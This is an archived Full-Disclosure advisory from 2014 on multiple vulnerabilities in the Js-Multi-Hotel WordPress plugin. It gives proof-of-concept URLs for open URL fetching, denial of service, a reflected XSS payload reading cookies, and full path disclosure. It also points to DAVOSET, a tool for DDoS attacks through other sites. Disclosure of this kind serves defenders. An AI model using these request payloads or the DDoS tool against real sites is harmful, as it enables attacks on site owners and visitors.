lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Mon, 31 Mar 2014 20:14:30 +0300
From: "MustLive" <mustlive@...security.com.ua>
To: <submissions@...ketstormsecurity.org>,
	<fulldisclosure@...lists.org>
Subject: [FD] Multiple vulnerabilities in Js-Multi-Hotel for WordPress

Hello list!

There are multiple vulnerabilities in Js-Multi-Hotel plugin for WordPress. 
Earlier I wrote about two other vulnerabilities.

These are Abuse of Functionality, Denial of Service, Cross-Site Scripting 
and Full path disclosure vulnerabilities in Js-Multi-Hotel plugin for 
WordPress. There are much more vulnerabilities in this plugin (including 
dangerous holes), so after two advisories I'll write new advisories.

-------------------------
Affected products:
-------------------------

Vulnerable are Js-Multi-Hotel 2.2.1 and previous versions.

-------------------------
Affected vendors:
-------------------------

Joomlaskin
http://www.joomlaskin.it

-------------------------
Affected products:
-------------------------

Vulnerable are Js-Multi-Hotel 2.2.1 and previous versions.

----------
Details:
----------

Abuse of Functionality (WASC-42):

http://site/wp-content/plugins/js-multihotel/includes/show_image.php?file=http://site&w=1&h=1

DoS (WASC-10):

http://site/wp-content/plugins/js-multihotel/includes/show_image.php?file=http://site/big_file&h=1&w=1

Besides conducting DoS attack manually, it's also possible to conduct 
automated DoS and DDoS attacks with using of DAVOSET 
(http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-June/008850.html).

DDoS attacks via other sites execution tool: 
http://websecurity.com.ua/davoset/

Video demonstration of DAVOSET: http://www.youtube.com/watch?v=RKi35-f346I

Cross-Site Scripting (WASC-08):

http://site/wp-content/plugins/js-multihotel/includes/delete_img.php?path=%3Cbody%20onload=with(document)alert(cookie)%3E

About XSS vulnerability in refreshDate.php in parameter roomid there was 
written earlier 
(http://packetstormsecurity.com/files/124239/WordPress-Js-Multi-Hotel-2.2.1-Cross-Site-Scripting.html).

Full path disclosure (WASC-13):

http://site/wp-content/plugins/js-multihotel/includes/functions.php

http://site/wp-content/plugins/js-multihotel/includes/myCalendar.php

http://site/wp-content/plugins/js-multihotel/includes/refreshDate.php?d=

http://site/wp-content/plugins/js-multihotel/includes/show_image.php

http://site/wp-content/plugins/js-multihotel/includes/widget.php

http://site/wp-content/plugins/js-multihotel/includes/phpthumb/GdThumb.inc.php

http://site/wp-content/plugins/js-multihotel/includes/phpthumb/thumb_plugins/gd_reflection.inc.php

I wrote about these vulnerabilities at my site 
(http://websecurity.com.ua/7087/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 



_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists